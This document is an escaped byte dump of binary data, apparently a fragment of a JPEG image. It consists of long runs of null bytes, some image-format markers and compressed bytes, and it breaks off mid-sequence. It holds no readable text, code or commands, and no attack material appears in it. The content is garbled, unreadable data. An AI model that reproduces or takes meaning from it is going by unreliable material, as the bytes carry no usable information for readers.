00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b\xde\x88\xf4\x80\x8fHj\x18\x80\x00\x00\x00,%y3\xec\x83\\\xea\xe6\xa1\xb2k%4\xcdv\xef\xa3A #\xd2\x02=\xb9\x90\x8fH\x08\xf4\x84x\xfb\xd0\xe2\xcay\x90\xc6\x99\xd44[cP\x03\xe9\xf1 #\xd2\x02=!\xe0\xd2[*\xa7\x90\x00e\xdb#\xd2\x1af0\x00\x00\xfa|H\x08\xf6\xe6\xb1\xe1 #\xc0\x01\xbb\xec\x8fH`5\x80\x00\x00\x00$\x08\xf4\x87\xc3A\x93\x18\x00\x03|\xd0Hj\x18\x99\xb6\x88\xf6\xf6\x88\x00\x04\x80\x8fH\x08\xf6\xd6\xa8\x00\xcabMx"\x1e\xbc\x80\x002\x98\x93Z&\x9bs\xc1\xad\xf7\xd7D9\xc2\xd5U\x00\x00\x00\x00\x03\xa5\xfb\x8f\xad\x97\xbf\x1e\xeb%\x9a\x8ba\x89+.\x83\xb4sE\xce\x9cy]\xb5\xca\x8a\xfb\x1aU\x17\xace\'\xa2Qn\x07\x88\x9c\xb1\xc7@\xe7\xdd\x07\x9f\x19\xefX}\x9e\xdc\xd6\xealn\xe9y6sQ\xaf&\x1c\xd4\xf9\xf3^f\x81\x7f1\xf9\xae\xc1\x1d\x17\x97Z\xab\x07N\xe6}3\x9c\x1a}#\x9f\xf4\xb1\x89@:\x04V-R\xa4\x9d\xb1\x14\x0c\xd6\x8f\x05\xab\x0e\x1a\x99x\xc5\x96\x92]\xa9\xd6HB\xcf\xcd\xad\xf4\xb3\x08\x00\x96\xbf\xf2\xae\x92ns\xcb\x9d\x10\xd5^\xf5\x8aj\xf1I<\x81\x97\x10\xea~\xa8\xf7\x82\x1e\x9di\xa8\x9d7\x1eZI\x03\xf2N\xd4P\x97\xca\xa1o\x95\xa5]L\x19\xf9\xed\xc4\x8b\xa7\xf4Z\xb1\x06\xbd`)\x8b\x8e\xc9Ef\xc2\x00\xe9\xfc\xc2\xd8Zp\xe6\xe6\'N\xa7M\xcb\x1c\xa95h9\xeb\xa5\xc3\x14\xde\x9d\xcc\xad\xa5\x9e\x1e`Q\xef\x14\xaby\xaf\xce,qF\x8a\xf5\x8c\xa4\xafZ\xa4\xfej\xad\xa8\xd6\xd8\xe7\xb2d\xad\x16zh\xa3\xad\xdb\xe5K\xa0\xc6K\x9f>\xf3\xd9\xa2w\x9d\xf4\xfa\xf9J^\xa2\x8a\xd2\xf2)}*\x87\xd0\x86\x1ctC\xa1@\xecE\x15\x8b\x1dr\xd0K\xd0:\';\x00\x00\x00\x00\x01\x97\x16S\xa8Vl\xd5\x92\xa1\xb5\xabe7\xf3\xcdD\x92\xd4;\xe5\x1c\xb2\xc8\xc1\xcb\x1a\x12\xf5;a\x03=E\xbd\x14{\x8d>\xd4h\xd6\xac\xb5\xa3\xa0P\xef\x9c\xfc\xe8\x11r_\x0e[\xf7gx\x88\xf95\no\xf4ns\xd1\x8a}j\xcbZ6:o2\xe9\xa6=X\xda\xd9\x1dj\xaa\xce\x17\x1eg\xd4\xf9i\xe6\xe3^\xb8\x92\x8aD\x817I\xe8Q\xc6Ejx\xd0\xc1j\xa9\x95i\x98i\x92\xf9E\xbdQHKUV\xc0]y\x9fL\xe6f\xb0\x00t\x9em\xd2Lp\x13\xf4\x83\xa3\xd5dd\xcd\x1a\x07E\xe7g\x80\x01\xf7\xa5\xf3;!o\xabZ\xfc\x1f9\x8d\xae\xaat\xbd)=3OwC\x11\x13u\xa5]Ly(\xb7\xa2\x89\xadk\xaa\x1d\x0e3B\xc4D\xfa\x93\xa1\x11\x9e\x00\x05\xb2\xa7l-<\xc3\xa7\xf3\x12\xcdh\x89\x96)\xb2>ld4\xccT\xa9A\x97\x8c\x93,9t\xabE\xc1\xecSl5\xebQ\xee\xbb1L:\x15f\xcdJ6\xedU[Q\xe6\xb5Z\x97+\xfd\n\xb92N\xd6\xe6y\xa9\xd2\xf6\xa2e\x8e_3\xad.Zaf\xaae\xaa\x12b$M\xd5\xad\'-\xba@ZIE\x0el\x91\xa4\xf4hb\x87!\x1f._\xb9\xd7E\xe6\x06\x10\x00\x00\x00\x00\xb9\xd37\x0e\x93\x8f\x9f\x8cS\xb5\x9f\'T\x8e\xa9\xe0:$=K\xc9\xd03\xf3\xaf\xa5\xc2S\x9c{-\x93\x1c\xdf!r\x92\xe7>\x8e\x83[\x82\xc0t\xba\xf5s\x11-s\xe5[gJQt\xcb5(/\xb3\x1c\xe3\xd9~\xe6\x9b\xb1\xe5\xaa\xd5\xcd3\x9d\x02\x87\x8fL\xc5\xbd\xa3\xbat\x8e[\xd4\xb9\xd9\x93\xa0r\xed\xd2\xff\x00\x97\x97\xca\x17\xca\xcc\x14i\xd3\xf5)X\x8e\x8f\x0b_\x8a<\xf4~q t]J7\xc2>\xefH\xdc:M:3X\xd7Y>\x95\xa5\x94h_\xf9\xaec\xa2D\xd4q\x9d\x0b^\x85\xba_9\x8e]\x825e\x15\xa5\x97H\x87\xf7\xe0u\x0c\xbc\xd7!\x8bT/\x92\xdc\xba\\\xb5\xebW\xe2K\xdc\xb78\xf6Ye\xf9\xf6#\xa7U\xa2\xe2\x8c\xbd3\x9c^\xcf\\\xd6\xcdY\t\xbd\xa2\xb4\xb2\x8a\xd7O\xe7\xfe\x8e\x89\x82\x84:%F\xbb\x88\xb5\xda\xb9\\\xc1l\x90\xe7B\xd7%\xcf\xf2\x1d\x12\x8b\xab\xaa^ey\x86\xd9%\x9e\xb94]0\xd6vK\x1d*\xeb\xcf\x0b\xe6~v/[<\xf0Ze\xb9\xd6c\xa2s\x9fZF\xff\x00A\xe5y\xce\x9b\xf6\x8b\xe0\xb9\xf3\xaf\x1e\x0e\x81+\xcb\xe5\x0b\xbe^e\xb2Zf\xf9\xb6R\xff\x00\x97\x97\xca\x97\xba\x94<x\x9d\x83\xb4\x16>g\xd2\xf9\xa0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\xb3^\xb6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1b:\xc3\xa8hs\xe1\x93\x18\x00\x00\x00\x00\x00\x00\x00\x02j\x14_\xfds\xe1`\xaf\x80\x00\x00\x00\x00\x00\x00\x00\x00\x07\xab\x9d(MB\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x7f\xff\xc4\x00\x02\xff\xda\x00\x0c\x03\x01\x00\x02\x00\x03\x00\x00\x00!\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x04\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xccA\x05\x11@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00`\x10A\x04\x10h\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\xa4\x10A\x04\x10U\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1c$\x98\x89\x17\x9b\xcd\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$r\xac\xd5\xe7\x15\xac\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00<\xf2\xe0\x00\x00\x07\xb0\xf0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\xf4\xc3\x9e\xb4\x7f-\xe4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\xe6\xaf<\xe7\xc1}d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x87\x7f;\xb1\xc6\xbf\xff\x00\xfe0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00/?\xff\x00\xff\x00\xfe\xfb\xef\x7f\xfe\xc0\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01o?\xff\x00\xfe\xfd\xcb\xff\x00\xff\x00\xfe\x98\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x007\x7f\xff\x00\xfbK[\x7f\xff\x00\xff\x00\xf8\xc0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00P\x17\xff\x00\xff\x00\xf7Lk\x7f\xff\x00\xfe\xe0H\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa4\x16\x7f\xff\x00\xff\x00\xedw\xef\xff\x00\xfc\x90P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x84\x14}\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xff\x00\xfc\x80U\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xd0\x01\x12\xc7\x1ds\xc7\x1cqRpP\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xc2\x00\x00\x00\x00\x00A\x04 \xc3\x0c0\xc3$\x00\xc0\x00\x10\xc3\x08\x10\x00\x04 \x00\x00\x10\xc2\x0c \x01\x0c\x00\x00\x00\x00\x03\x00\x00\x01\x080\x80\x00\x10\xc2\x00\x10\x02\x00\x00C\x0cP\x80\x00\x00\x00\x00@\x06\x0c \x82\x04R@\x04\x12\x08$\xa3\x03\x00a\xca\x0cQ\xc0\x08 \x00\x04\x00\x00\x00@\x824\x90\xc2\x0c0\x81\x08\x01D\x00 \x86\x10\x82\x01\x08!\x02\x08@\x8d\x0c\x12\x824R\x80\x00\x00\x00\x00\x00\x05$S\xc2\x00\x01D\x10\x00\n\x00\xa3\xc5(\x10\x01\x04\x90\x00\x00P\x00\x14AN\x00\x00\r\x14\x93\x8a\x08\xc2\xca\x00\x01D\x08@\x88\x04\xc0\x07\x04\xa1\xc6\x00"\x004\x80B$\x11\x00\x00\x00\x00\x00A\xc4\x18\x02\xc9\x0c\x13\xc2 0\t(\x13\x84\x10\xb0\x87\x0cq\x03\x000\x80\x04 \x0c\x00\x10\n\x00\xa0A\x04A\x8c\x00\x00\x86\x10\xa0\xc6\x18\x11C\x00\x92\xc2\x08\x82\xcc\x040\xc2\x00P\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x040\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x01\x08 \x00\x00\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xc4\x00\x02\xff\xda\x00\x0c\x03\x01\x00\x02\x00\x03\x00\x00\x00\x10\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\xcf<\xf3\x